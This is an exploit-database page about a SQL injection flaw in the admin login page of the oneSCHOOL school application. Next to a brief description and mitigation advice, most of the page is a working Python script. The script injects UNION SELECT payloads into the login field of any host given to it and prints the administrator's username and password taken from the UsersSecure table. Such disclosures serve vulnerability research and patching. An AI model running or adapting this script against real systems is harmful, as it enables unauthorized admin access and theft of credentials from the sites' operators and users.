header-logo
Suggest Exploit
vendor:
oneSCHOOL
by:
Guga360
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: oneSCHOOL
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

oneSCHOOL admin/login.asp SQL Injection exploit

This exploit allows an attacker to perform SQL injection on the admin/login.asp page of oneSCHOOL application. It retrieves the login name and password from the UsersSecure table. The exploit works for all versions of oneSCHOOL.

Mitigation:

To mitigate this vulnerability, ensure that user inputs are properly validated and sanitized before executing them as part of SQL queries. Use parameterized queries or prepared statements to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/python

#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
#by Guga360.

import urllib
from sys import argv

query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}

queryx = urllib.urlencode(query)

if len(argv)<>2:
    print """
    **********
    
    Usage:
    oneSCHOOLxpl.py [host]

    [+] Exploiting...
    
    [+] User: admin
    [+] Password: 123
    
    *******************
    """
else:
    try:
        print '\n[+] Exploting...\n'
        host = argv[1]        
        if host[0:7]<>'http://':
            host = 'http://'+host
        url = urllib.urlopen(host+'/admin/login.asp', queryx)
        url = url.read()
        url = url.split()
        name = url.index('varchar')+2
        name = url[name]
        name = name.replace("'","")
        print '[+] User: ' + name
        query2 = query.copy()
        query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
        query2 = urllib.urlencode(query2)
        url = urllib.urlopen(host+'/admin/login.asp', query2)
        url = url.read()
        url = url.split()
        passw = url.index('varchar')+2
        passw = url[passw]
        passw = passw.replace("'","")
        print '[+] Pass: '+passw
    except:
        print '[+] Not vulnerable!'

# milw0rm.com [2007-12-31]

Navigation

Suggest Exploit

Services By CQR